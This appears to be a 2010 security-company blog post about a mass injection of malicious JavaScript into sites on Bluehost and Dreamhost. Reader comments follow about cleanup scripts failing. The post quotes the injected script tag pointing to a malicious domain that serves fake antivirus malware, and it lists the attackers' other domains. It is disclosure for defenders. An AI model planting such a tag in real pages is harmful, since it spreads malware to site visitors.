Yet another series of attacks (part X) - vancouvererrorsonfile.com and the hilarykneber group

If you have been following our blog long, you probably heard about quite a few large scale attacks affecting many hosting companies: GoDaddy, Bluehost, Dreamhost, etc, etc.

The new one that started to spread today uses a javascript file pointing to http://vancouvererrorsonfile.com/js2.php. When called, it will load www4.meowmeow4.co.cc and then offer the famous “fake AV” virus to the end user of a site. That’s how it looks like in a site:

< script src =" http://vancouvererrorsonfile.com/js2.php

Or in our scanner (blueh2):

Note that this domain is not currently blacklisted (and the site is up), so be careful when clicking those links. So far, we are seeing this spread only on Bluehost and Dreamhost, but it seems to be too early to tell how many sites are affected.

If your site is hacked, this script should clean it up: virus-fix.php or contact us for a professional help (support@sucuri.net).

However, what is interesting is the people behind this attack (and all others). Those domains are always registered by:

Hilary Kneber hilarykneber@yahoo.com
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
us

You can check all the big ones that affected a large number of sites:

whereisdudescars.com
domainameat.cc
cloudisthebestnow.com
losotrana.com
indesignstudioinfo.com
zettapetta.com

All by the same group and all of them using the same tactics. We should start monitoring registrations using this domain and block them automatically.

We will post more details as we learn about it.

8 comments

Pingback: Tweets that mention Yet another series of attacks (part X) – vancouvererrorsonfile.com and the hilarykneber group | Sucuri -- Topsy.com
Manpreet Singh Rehsi says:
August 5, 2010 at 7:41 am
I am have a bluehost account many of my blogs like softpoint.in, manpreetrehsi.com, knowhimachal.com and some the php scripts on various website have been hacked in twice. can anyone help me in fixing the hole so that it does ot happens again. Help
My recent post Control Multiple Computers With Single Set of Keyboard-Mouse
@makemydaymag says:
August 5, 2010 at 8:31 am
the fix seems to not work fine this time! The problem persists in my blog hosted on bluehost…
Paul says:
August 5, 2010 at 10:05 pm
Your post suggests using your virus-fix.php script but that link directs to the wordpress-fix.php script which doesn't seem to work for this attack (although it is also a base64 style attack so I don't understand why not). Is the link incorrect, is there actually a virus-fix.php script available?
Thanks – the worpress-fix script was really useful. Hope you can help this time too.
Katy says:
August 12, 2010 at 7:42 pm
Hi there, this fix doesn't seem to be working either!
Markpile says:
August 13, 2010 at 12:50 pm
I got it to work after a couple tries.
I saw a few files in the root that looked unfamiliar (ujiyi.php, xpbom.php), so I removed them. Seems to have worked for now.
Josh says:
August 17, 2010 at 1:10 am
This is not working for my sites either.
Pingback: Hilary Kneber (part XI) – sippa.dottasink.net | Sucuri